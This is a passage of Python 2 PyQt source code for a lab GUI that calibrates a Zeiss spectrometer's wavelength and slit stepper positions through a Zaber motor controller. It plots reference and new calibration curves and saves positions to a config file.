v_all.addWidget(v8)
v_all.addWidget(h4)
v_all.addWidget(h5)
v_all.addWidget(v1)
v_all.addWidget(g9_0)
# set graph and toolbar to a new vertical group vcan
pw = pg.GraphicsLayoutWidget()
pw.setFixedWidth(750)
self.p0 = pw.addPlot()
self.p0.setTitle('Ref calib file')
self.p0.setLabel('left', u'\u03bb', units='m')
self.p0.setLabel('bottom', 'stepper micropos.')
self.p1 = pw.addPlot()
self.p1.setTitle('New calib file')
self.p1.setLabel('left', u'\u03bb', units='m')
self.p1.setLabel('bottom', 'stepper micropos.')
# SET ALL VERTICAL COLUMNS TOGETHER
h_all = QtGui.QHBoxLayout()
h_all.addLayout(v_all)
h_all.addWidget(pw)
self.setLayout(h_all)
########################################
# create plot and add it to the figure canvas
self.p0.addLegend()
#self.curve0=self.p0.plot(pen='r')
self.curve0_1=self.p0.plot(pen='m',name='raw data')
self.curve0_2=self.p0.plot(pen='b',name='spline')
#self.p0.setDownsampling(mode='peak')
#self.p0.setClipToView(True)
# PLOT 3 settings
self.p1.addLegend()
self.curve2=self.p1.plot(pen='m',name='raw data')
#self.curve1=self.p1.plot(pen='b',name='spline')
#self.curve3=self.p1.plot(pen='w',name='scan')
#########################################
self.calibSaveButton.clicked.connect(self.add_calib)
self.calibButton.clicked.connect(self.move_to_val2)
self.calibButton.clicked.connect(self.update_calib_button)
self.setzeroButton.clicked.connect(self.set_zero)
self.cb3.activated[str].connect(self.onActivated3)
#self.reorderButton.clicked.connect(self.set_reorder)
self.upButton.clicked.connect(self.move_jog)
self.downButton.clicked.connect(self.move_jog)
self.moverelButton.clicked.connect(self.move_rel)
self.moveabsButton.clicked.connect(self.move_abs)
self.moveButton.clicked.connect(self.move_to_val)
self.stopButton.clicked.connect(self.move_stop)
self.infoCalibButton.clicked.connect(self.showInfoCalibFiles)
#self.move(0,175)
#self.setWindowTitle('Zeiss spectrometer calibration')
self.show()
self.allButtons_torf(False)
self.stopButton.setEnabled(False)
self.bad_zaber_vals=False
self.calib_mode="wavelength"
self.set_lambda_calib_data()
self.loadWaveCalibValues()
##########################################
def ZaberDialog(self):
text, ok = QtGui.QInputDialog.getText(self, 'Serial Port Dialog','Enter Zaber stepper serial:', text=self.zaberport_str)
if ok:
self.zaberport_str = str(text)
def loadCalibLambdaDialog(self):
fname = QtGui.QFileDialog.getOpenFileName(self, 'Load ref wavelength calib','Calib_files')
old_calib=self.calibfile_lambda_str
if fname:
try:
self.calibfile_lambda_str = str(fname)
self.showInfoCalibFiles()
except ValueError as e:
self.calibfile_lambda_str = old_calib
QtGui.QMessageBox.warning(self, 'Message', "Something is wrong with lambda calib file! Do you have a file with 2 columns, no headers, and all inputs are digits?")
return
if self.calib_mode=="wavelength":
self.set_lambda_calib_data()
def loadWaveDialog(self):
fname = QtGui.QFileDialog.getOpenFileName(self, 'Load wavelength vals for calib','Calib_files')
if fname:
self.lambda_str = str(fname)
if self.calib_mode=="wavelength":
self.loadWaveCalibValues()
def loadWaveCalibValues(self):
try:
self.y_local=[]
self.calibCounter=0
with open(self.lambda_str, 'r') as thefile:
for line in thefile:
columns = line.split()
self.y_local.extend([round(float(columns[0]),1)])
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the wavelength file! Do you have a wavelength file with 1 column, no headers, and all inputs are digits?")
self.calibButton.setText('Adjust to ---- nm')
self.calibButton.setEnabled(False)
self.calibSaveButton.setEnabled(False)
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' nm']))
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' nm' ]))
#self.calibCounter+=1
def loadCalibSlitDialog(self):
fname = QtGui.QFileDialog.getOpenFileName(self, 'Load ref slit width calib','Calib_files')
old_calib=self.calibfile_slit_str
if fname:
try:
self.calibfile_slit_str = str(fname)
self.showInfoCalibFiles()
except ValueError as e:
self.calibfile_slit_str = old_calib
QtGui.QMessageBox.warning(self, 'Message', "Something is wrong with slit calib file! Do you have a file with 2 columns, no headers, and all inputs are digits?")
return
if self.calib_mode=="slit":
self.set_slit_calib_data()
def loadSlitDialog(self):
fname = QtGui.QFileDialog.getOpenFileName(self, 'Load slit width vals for calib','Calib_files')
if fname:
self.slit_str = str(fname)
if self.calib_mode=="slit":
self.loadSlitCalibValues()
def loadSlitCalibValues(self):
try:
self.y_local=[]
self.calibCounter=0
with open(self.slit_str, 'r') as thefile:
for line in thefile:
columns = line.split()
self.y_local.extend([round(float(columns[0]),2)])
except Exception, e:
QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the slit width file! Do you have a slit width file with 1 column, no headers, and all inputs are digits?")
self.calibButton.setText('Adjust to ---- mm')
self.calibButton.setEnabled(False)
self.calibSaveButton.setEnabled(False)
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' mm']))
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' mm' ]))
#self.calibCounter+=1
def showInfoCalibFiles(self):
head, tail1 = os.path.split(self.calibfile_lambda_str)
head, tail2 = os.path.split(self.calibfile_slit_str)
x0=[]
y0=[]
with open(self.calibfile_lambda_str, 'r') as thefile:
for line in thefile:
columns = line.split()
x0.extend([int(columns[0])]) #microstep pos.
y0.extend([round(float(columns[1]),1)]) #wavelength
x1=[]
y1=[]
with open(self.calibfile_slit_str, 'r') as thefile:
for line in thefile:
columns = line.split()
x1.extend([int(columns[0])]) #microstep pos.
y1.extend([round(float(columns[1]),2)]) #wavelength
QtGui.QMessageBox.information(self, "Drive files information",''.join(["<font color=\"black\">Calib lambda: </font> <font color=\"green\">",tail1,"< </font> <br> <font color=\"black\">Calib lambda range: </font> <font color=\"green\">",str(y0[0])," to ",str(y0[-1])," nm < </font> <br> <font color=\"black\">Calib slit:< </font> <font color=\"blue\">",tail2,"< </font> <br> <font color=\"black\">Calib slit range: </font> <font color=\"blue\">",str(y1[0])," to ",str(y1[-1])," mm <" ]))
def set_connect(self):
try:
self.Za = ZaberXmcb_ascii.Zaber_Xmcb(self.zaberport_str)
except Exception as e:
QtGui.QMessageBox.warning(self, 'Message',"No response from the Zaber serial port! Check the serial port name and connections.")
return
# constants
min_pos_lambda=self.Validrange_lambda[0]
max_pos_lambda=self.Validrange_lambda[1]
min_pos_slit=self.Validrange_slit[0]
max_pos_slit=self.Validrange_slit[1]
hc=25
rc=50
ms=2048
try:
self.Za.set_timeout(0.5)
self.Za.set_Maximum_Position(1,1,max_pos_lambda)
self.Za.set_Minimum_Position(1,1,min_pos_lambda)
self.Za.set_Hold_Current(1,1,hc)
self.Za.set_Running_Current(1,1,rc)
self.Za.set_Max_Speed(1,1,ms)
# Enable user to edit advanced settings
#self.Za.set_System_Access(1,2) # OPEN ADVANCED
#self.Za.set_Motor_Dir(1,2,1) # REVERSE motor direction
#self.Za.set_System_Access(1,1) # CLOSE ADVANCED
self.Za.set_Maximum_Position(1,2,max_pos_slit)
self.Za.set_Minimum_Position(1,2,min_pos_slit)
self.Za.set_Hold_Current(1,2,hc)
self.Za.set_Running_Current(1,2,rc)
self.Za.set_Max_Speed(1,2,ms)
micstep=self.Za.return_Microstep_Resolution(1,1)
sc=self.Za.return_System_Current(1)
# TURN ON/OFF ALERTS
if self.Za.return_Alert(1)==0:
self.Za.set_Alert(1,1)
self.Za.set_Current_Position(1,1,config_zeiss.Last_position_lambda[0])
self.Za.set_Current_Position(1,2,config_zeiss.Last_position_slit[0])
except Exception as e:
self.Za.close()
QtGui.QMessageBox.warning(self, 'Message',"No response from the Zaber stepper! Is stepper powered and connected to the serial?")
return None
hc_str=''.join([str(hc*25e-3)," / ",str(rc*25e-3)," Amps" ])
print "Hold / Running current:", hc_str
sys_str=''.join([ str(sc), " Amps" ])
print "System current (0-5):", sys_str
ms_str=''.join([str(ms/1.6384), " microsteps/s"])
print "Max speed:", ms_str
micstep_str=''.join([str(micstep), " microsteps/step"])
print "Microstep resolution:", str(micstep_str)
pos_lambda_str=''.join([str(min_pos_lambda)," to ", str(max_pos_lambda)," microsteps"])
print "Stepper range for the wavelengths:", pos_lambda_str
pos_slit_str=''.join([str(min_pos_slit)," to ", str(max_pos_slit)," microsteps"])
print "Stepper range for the slits:", pos_slit_str
self.allButtons_torf(True)
self.stopButton.setEnabled(False)
self.conMode.setEnabled(False)
self.serialZaber.setEnabled(False)
if self.calib_mode=="wavelength":
self.set_lambda_calib_data()
elif self.calib_mode=="slit":
self.set_slit_calib_data()
self.timer = QTimer(self)
self.connect(self.timer, SIGNAL("timeout()"), self.set_disconnect)
self.timer.setSingleShot(True)
self.timer.start(1000*60*10)
def set_disconnect(self):
self.Za.set_Hold_Current(1,1,0)
self.Za.set_Hold_Current(1,2,0)
self.Za.close()
self.allButtons_torf(False)
self.conMode.setEnabled(True)
def allButtons_torf(self,trueorfalse):
self.calibWaveZeiss.setEnabled(trueorfalse)
self.waveZeiss.setEnabled(trueorfalse)
self.calibSlitZeiss.setEnabled(trueorfalse)
self.slitZeiss.setEnabled(trueorfalse)
self.disconMode.setEnabled(trueorfalse)
self.calibButton.setEnabled(trueorfalse)
self.alignEdit.setEnabled(trueorfalse)
self.setzeroButton.setEnabled(trueorfalse)
self.calibSaveButton.setEnabled(trueorfalse)
self.cb3.setEnabled(trueorfalse)
self.infoCalibButton.setEnabled(trueorfalse)
#self.reorderButton.setEnabled(trueorfalse)
self.filenameEdit.setEnabled(trueorfalse)
self.folderEdit.setEnabled(trueorfalse)
self.upButton.setEnabled(trueorfalse)
self.downButton.setEnabled(trueorfalse)
self.moverelButton.setEnabled(trueorfalse)
self.moveabsButton.setEnabled(trueorfalse)
self.moveButton.setEnabled(trueorfalse)
self.moverelEdit.setEnabled(trueorfalse)
self.moveabsEdit.setEnabled(trueorfalse)
self.moveEdit.setEnabled(trueorfalse)
#self.stopButton.setEnabled(trueorfalse)
##########################################
def set_bstyle_v1(self,button):
button.setStyleSheet('QPushButton {font-size: 25pt}')
button.setFixedWidth(40)
button.setFixedHeight(40)
def onActivated3(self, text):
if str(text)=="wavelength":
reply = QtGui.QMessageBox.question(self, 'Message', "Do you want to calibrate wavelengths stepper positions?", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
self.calib_mode="wavelength"
self.p0.setLabel('left', u'\u03bb', units='m')
self.p1.setLabel('left', u'\u03bb', units='m')
self.setzeroButton.setText("-> nm")
self.moveButton.setText("Move to nm")
self.all_pos=[config_zeiss.Last_position_lambda[0]]
self.set_lambda_calib_data()
self.loadWaveCalibValues()
self.curve2.clear()
self.set_save()
else:
self.cb3.setCurrentIndex(1)
elif str(text)=="slit":
reply = QtGui.QMessageBox.question(self, 'Message', "Do you want to calibrate slit widths stepper positions?", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
self.calib_mode="slit"
self.p0.setLabel('left', 'slit width', units='m')
self.p1.setLabel('left', 'slit width', units='m')
self.setzeroButton.setText("-> mm")
self.moveButton.setText("Move to mm")
self.all_pos=[config_zeiss.Last_position_slit[0]]
self.set_slit_calib_data()
self.loadSlitCalibValues()
self.curve2.clear()
self.set_save()
else:
self.cb3.setCurrentIndex(0)
def add_calib(self):
if str(self.filenameEdit.text()):
saveinfile=''.join([str(self.filenameEdit.text()),'_',self.timestr])
else:
saveinfile=''.join(["calib_",self.timestr])
if str(self.folderEdit.text()):
if not os.path.isdir(str(self.folderEdit.text())):
os.mkdir(str(self.folderEdit.text()))
saveinfolder=''.join([str(self.folderEdit.text()),"/"])
else:
saveinfolder=""
save_to_file=''.join([saveinfolder,saveinfile,".txt"])
if not os.path.exists(save_to_file):
print "Calib file created: ", save_to_file
with open(save_to_file, 'w') as thefile:
pass
with open(save_to_file, 'r') as thefile:
# read a list of lines into data
data = thefile.readlines()
if data and str(self.val_point) in data[-1]:
if self.calib_mode=="wavelength":
data[-1]=''.join([str(self.all_pos[-1]),'\t',str(self.val_point),'\n'])
elif self.calib_mode=="slit":
data[-1]=''.join([str(self.all_pos[-1]),'\t',str(self.val_point),'\n'])
with open(save_to_file, 'w') as thefile:
thefile.writelines(data)
else:
if self.calib_mode=="wavelength":
with open(save_to_file, 'a') as thefile:
thefile.write('%s' %self.all_pos[-1] )
thefile.write('\t%s\n' %self.val_point)
elif self.calib_mode=="slit":
with open(save_to_file, 'a') as thefile:
thefile.write('%s' %self.all_pos[-1] )
thefile.write('\t%s\n' %self.val_point)
# open calib file and plot
x=[]
y=[]
with open(save_to_file, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])])
if self.calib_mode=="wavelength":
y.extend([round(float(columns[1]),1)])
elif self.calib_mode=="slit":
y.extend([round(float(columns[1]),2)])
if self.calib_mode=="wavelength":
self.curve2.setData(x,numpy.array(y)/1.0e9)
elif self.calib_mode=="slit":
self.curve2.setData(x,numpy.array(y)/1.0e3)
#self.reorderButton.setEnabled(True)
def update_calib_button(self):
if self.calib_mode=="wavelength":
if len(self.y_local)-1>self.calibCounter:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' nm' ]))
self.calibCounter+=1
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' nm']))
else:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' nm' ]))
self.calibCounter=0
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' nm']))
elif self.calib_mode=="slit":
if len(self.y_local)-1>self.calibCounter:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' mm' ]))
self.calibCounter+=1
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' mm']))
else:
self.val_point=self.y_local[self.calibCounter]
self.calibSaveButton.setText(''.join(['Save at ',str(self.val_point),' mm' ]))
self.calibCounter=0
self.calibButton.setText(''.join(['Adjust to ',str(self.y_local[self.calibCounter]),' mm']))
'''
def set_reorder(self):
if os.path.exists(self.filenameEdit.text()):
# open calib file and get all x and y
x=[]
y=[]
with open(self.save_to_file, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])])
y.extend([round(float(columns[1]),1)])
# sort x element and their respective y
sort_index = numpy.argsort(x)
sort_x=[]
sort_y=[]
with open(self.save_to_file, 'w') as thefile:
for i in sort_index:
thefile.write('%s\t' %x[i])
thefile.write('%s\n' %y[i])
sort_x.extend([ x[i] ])
sort_y.extend([ y[i] ])
self.curve2.setData(sort_x,sort_y)
#self.alignEdit.setText('')
else:
print "Warning! The calib file path does not exists!"
'''
def set_lambda_calib_data(self):
try:
x=[]
y=[]
with open(self.calibfile_lambda_str, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])])
y.extend([round(float(columns[1]),1)])
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the ref calib file! Do you have a ref Calib file with 2 columns, no headers, and all inputs are numbers?")
return
self.min_y_calib=min(y)
self.max_y_calib=max(y)
if min(x)<self.Validrange_lambda[0] or max(x)>self.Validrange_lambda[1]:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength stepper range is from ',str(self.Validrange_lambda[0]),' to ',str(self.Validrange_lambda[1]),' microsteps.' ]) )
return
self.curve0_1.setData(x,numpy.array(y)/1.0e9)
wv_fine=numpy.arange(y[0],y[-1]+0.1,0.1)
#spline
wv_curve=scipy.interpolate.splrep(y, x, k=3, s=0)
#linear
#wv_curve = scipy.interpolate.splrep(y, x, k=1, s=0)
positions_fine = scipy.interpolate.splev(wv_fine, wv_curve, der=0)
self.curve0_2.setData(positions_fine,numpy.array(wv_fine)/1.0e9)
my_pos = self.all_pos[-1]
if my_pos<min(x) or my_pos>max(x):
QtGui.QMessageBox.warning(self, 'Message', "Current wavelength position is outside range of the calibration lambda file!")
self.lcd1.display('-')
self.lcd2.display('-')
else:
# Update the LCD display lcd2 with the wavelength which
# corresponds to the saved Zaber microposition
wv_curve2=scipy.interpolate.splrep(x, y, k=3, s=0)
first_pos_val = round(scipy.interpolate.splev(my_pos, wv_curve2, der=0), 1)
lcd_obj=type('lcd_obj',(object,),{'min_pos':my_pos, 'pos_val':first_pos_val})
self.more_tals(lcd_obj)
self.replace_line("config_zeiss.py",4,''.join(["Last_position_lambda=[",str(my_pos),",",str(first_pos_val),"]\n"]))
imp.reload(config_zeiss)
def set_slit_calib_data(self):
try:
x=[]
y=[]
with open(self.calibfile_slit_str, 'r') as thefile:
for line in thefile:
columns = line.split()
x.extend([int(columns[0])])
y.extend([round(float(columns[1]),2)])
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message',"Something is wrong with the ref calib file! Do you have a ref Calib file with 2 columns, no headers, and all inputs are numbers?")
return
self.min_y_calib=min(y)
self.max_y_calib=max(y)
if min(x)<self.Validrange_slit[0] or max(x)>self.Validrange_slit[1]:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit stepper range is from ',str(self.Validrange_slit[0]),' to ',str(self.Validrange_slit[1]),' microsteps.' ]) )
return
self.curve0_1.setData(x,numpy.array(y)/1.0e3)
slit_fine=numpy.arange(y[0],y[-1]+0.01,0.01)
#spline
slit_curve=scipy.interpolate.splrep(y, x, k=3, s=0)
#linear
#slit_curve = scipy.interpolate.splrep(y, x, k=1, s=0)
positions_fine = scipy.interpolate.splev(slit_fine, slit_curve, der=0)
self.curve0_2.setData(positions_fine,numpy.array(slit_fine)/1.0e3)
my_pos = self.all_pos[-1]
if my_pos<min(x) or my_pos>max(x):
QtGui.QMessageBox.warning(self, 'Message', "Current slit position is outside range of the calibration slit file!")
self.lcd1.display('-')
self.lcd2.display('-')
else:
# Update the LCD display lcd2 with the wavelength which
# corresponds to the saved Zaber microposition
wv_curve2=scipy.interpolate.splrep(x, y, k=3, s=0)
first_pos_val = round(scipy.interpolate.splev(my_pos, wv_curve2, der=0), 2)
lcd_obj=type('lcd_obj',(object,),{'min_pos':my_pos, 'pos_val':first_pos_val})
self.more_tals(lcd_obj)
self.replace_line("config_zeiss.py",5,''.join(["Last_position_slit=[",str(my_pos),",",str(first_pos_val),"]\n"]))
imp.reload(config_zeiss)
def move_stop(self):
self.get_zaber_Thread.abort_move()
def set_zero(self):
if self.calib_mode=="wavelength":
try:
move_num=round(float(self.alignEdit.text()),1)
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a wavelength!")
return
if move_num<self.min_y_calib or move_num>self.max_y_calib:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength range is from ',str(self.min_y_calib),' nm to ',str(self.max_y_calib),' nm.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
elif self.calib_mode=="slit":
try:
move_num=round(float(self.alignEdit.text()),2)
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a slit width!")
return
if move_num<self.min_y_calib or move_num>self.max_y_calib:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit range is from ',str(self.min_y_calib),' mm to ',str(self.max_y_calib),' mm.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
self.get_zaber_Thread.start()
def move_to_val(self):
if self.calib_mode=="wavelength":
try:
move_num=round(float(self.moveEdit.text()),1)
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a wavelength!")
return
if move_num<self.min_y_calib or move_num>self.max_y_calib:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength range is from ',str(self.min_y_calib),' nm to ',str(self.max_y_calib),' nm.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
elif self.calib_mode=="slit":
try:
move_num=round(float(self.moveEdit.text()),2)
except ValueError as e:
QtGui.QMessageBox.warning(self, 'Message', "Only real decimal numbers are accepted as a slit width!")
return
if move_num<self.min_y_calib or move_num>self.max_y_calib:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit width range is from ',str(self.min_y_calib),' mm to ',str(self.max_y_calib),' mm.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
self.allButtons_torf(False)
self.stopButton.setEnabled(True)
self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
self.get_zaber_Thread.start()
def move_to_val2(self):
if self.calib_mode=="wavelength":
move_num = round(self.y_local[self.calibCounter],1)
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
elif self.calib_mode=="slit":
move_num = round(self.y_local[self.calibCounter],2)
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
print move_num
self.allButtons_torf(False)
self.stopButton.setEnabled(True)
self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
self.get_zaber_Thread.start()
def move_rel(self):
move_num = int(self.moverelEdit.text())
if self.calib_mode=="wavelength":
move_tot = move_num+self.all_pos[-1]
if move_tot<self.Validrange_lambda[0] or move_tot>self.Validrange_lambda[1]:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength stepper range is from ',str(self.Validrange_lambda[0]),' to ',str(self.Validrange_lambda[1]),' microsteps.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
elif self.calib_mode=="slit":
move_tot = move_num+self.all_pos[-1]
if move_tot<self.Validrange_slit[0] or move_tot>self.Validrange_slit[1]:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit width stepper range is from ',str(self.Validrange_slit[0]),' to ',str(self.Validrange_slit[1]),' microsteps.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
self.allButtons_torf(False)
self.stopButton.setEnabled(True)
self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
self.get_zaber_Thread.start()
def move_abs(self):
move_num = int(self.moveabsEdit.text())
if self.calib_mode=="wavelength":
if move_num<self.Validrange_lambda[0] or move_num>self.Validrange_lambda[1]:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid wavelength stepper range is from ',str(self.Validrange_lambda[0]),' to ',str(self.Validrange_lambda[1]),' microsteps.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str,move_num)
elif self.calib_mode=="slit":
if move_num<self.Validrange_slit[0] or move_num>self.Validrange_slit[1]:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid slit stepper range is from ',str(self.Validrange_slit[0]),' to ',str(self.Validrange_slit[1]),' microsteps.' ]) )
return
else:
self.timer.stop()
sender = self.sender()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str,move_num)
self.allButtons_torf(False)
self.stopButton.setEnabled(True)
self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
self.get_zaber_Thread.start()
def move_jog(self):
sender = self.sender()
if sender.text()==u'\u25b2':
move_num=10
elif sender.text()==u'\u25bc':
move_num=-10
######################################
if self.calib_mode=="wavelength":
# update the lcd motorstep position
validrange_min, validrange_max=self.Validrange_lambda
move_tot = move_num+self.all_pos[-1]
if move_tot<validrange_min or move_tot>validrange_max:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid range is from ',str(validrange_min),' to ',str(validrange_max),' microsteps.' ]) )
return
else:
self.timer.stop()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_lambda_str)
if self.calib_mode=="slit":
# update the lcd motorstep position
validrange_min, validrange_max=self.Validrange_slit
move_tot = move_num+self.all_pos[-1]
if move_tot<validrange_min or move_tot>validrange_max:
QtGui.QMessageBox.warning(self, 'Message',''.join(['Valid range is from ',str(validrange_min),' to ',str(validrange_max),' microsteps.' ]) )
return
else:
self.timer.stop()
self.get_zaber_Thread=zaber_Thread(sender.text(),self.Za,self.calib_mode,self.calibfile_slit_str)
self.connect(self.get_zaber_Thread,SIGNAL("more_tals(PyQt_PyObject)"),self.more_tals)
self.connect(self.get_zaber_Thread,SIGNAL('bad_zaber_val(PyQt_PyObject)'), self.bad_zaber_val)
self.connect(self.get_zaber_Thread,SIGNAL('finished()'), self.set_finished)
self.get_zaber_Thread.start()
def more_tals(self,more_tals_obj):
self.all_pos.extend([ int(more_tals_obj.min_pos) ])
self.lcd1.display(str(more_tals_obj.min_pos))
self.lcd2.display(str(more_tals_obj.pos_val))
def bad_zaber_val(self,pyqt_object):
self.bad_zaber_vals=pyqt_object
def set_finished(self):
if self.bad_zaber_vals==serial.SerialException:
QtGui.QMessageBox.warning(self, 'Message',"Zaber serial severed. Closing the program..." )
sys.exit()
self.stopButton.setEnabled(False)
if self.bad_zaber_vals==ValueError:
QtGui.QMessageBox.warning(self, 'Message',"Zaber getting bad values. Closing the serial..." )
self.bad_zaber_vals=False
self.set_disconnect()
return
self.allButtons_torf(True)
self.timer.start(1000*60*10)
def closeEvent(self, event):
if hasattr(self, 'Za'):
reply = QtGui.QMessageBox.question(self, 'Message', "Quit calibration now? The microstep position will be saved and the stepper hold current will be set to zero!", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
else:
reply = QtGui.QMessageBox.question(self, 'Message', "Quit calibration now?", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
if reply==QtGui.QMessageBox.Yes:
if hasattr(self, 'Za'):
if not hasattr(self, 'get_zaber_Thread'):
if self.Za.is_open():
self.Za.set_Hold_Current(1,1,0)
self.Za.set_Hold_Current(1,2,0)
self.Za.close()
else:
if self.get_zaber_Thread.isRunning():
QtGui.QMessageBox.warning(self, 'Message', "Calibration in progress. Cancel the move then quit!")
event.ignore()
return
else:
if self.Za.is_open():
self.Za.set_Hold_Current(1,1,0)
self.Za.set_Hold_Current(1,2,0)
self.Za.close()
if hasattr(self, 'timer'):
if self.timer.isActive():
self.timer.stop()
event.accept()
else:
event.ignore()
def set_save_plots(self):
if str(self.folderEdit.text()):
if not os.path.isdir(str(self.folderEdit.text())):
os.mkdir(str(self.folderEdit.text()))
saveinfolder=''.join([str(self.folderEdit.text()),"/"])
else:
saveinfolder=""
save_pic_to_file=''.join([saveinfolder,self.timestr,'.png'])
# create an exporter instance, as an argument give it
# the item you wish to export
exporter = pg.exporters.ImageExporter(self.p0.scene())
# set export parameters if needed
#exporter.parameters()['width'] = 100 # (note this also affects height parameter)
# save to file
exporter.export(save_pic_to_file)
def set_save(self):
self.timestr=time.strftime("%y%m%d-%H%M")
self.replace_line("config_zeiss.py",4, ''.join(["Last_position_lambda=",str(config_zeiss.Last_position_lambda),"\n"]) )
self.replace_line("config_zeiss.py",5, ''.join(["Last_position_slit=",str(config_zeiss.Last_position_slit),"\n"]) )
self.replace_line("config_zeiss.py",7, ''.join(["calibfile_lambda=\"",self.calibfile_lambda_str,"\"\n"]) )
self.replace_line("config_zeiss.py",8, ''.join(["calibfile_slit=\"",self.calibfile_slit_str,"\"\n"]) )
self.replace_line("config_zeiss.py",9, ''.join(["lambdafile=\"",self.lambda_str,"\"\n"]) )
self.replace_line("config_zeiss.py",10, ''.join(["slitfile=\"",self.slit_str,"\"\n"]) )
self.replace_line("config_zeiss.py",11, ''.join(["calib_lambda_filename=\"",str(self.filenameEdit.text()),"\"\n"]) )
self.replace_line("config_zeiss.py",12, ''.join(["calib_lambda_foldername=\"",str(self.folderEdit.text()),"\"\n"]) )
self.replace_line("config_zeiss.py",13, ''.join(["calib_slit_filename=\"",str(self.filenameEdit.text()),"\"\n"]) )
self.replace_line("config_zeiss.py",14, ''.join(["calib_slit_foldername=\"",str(self.folderEdit.text()),"\"\n"]) )
self.replace_line("config_zeiss.py",17, ''.join(["timestr=\"",self.timestr,"\"\n"]) )
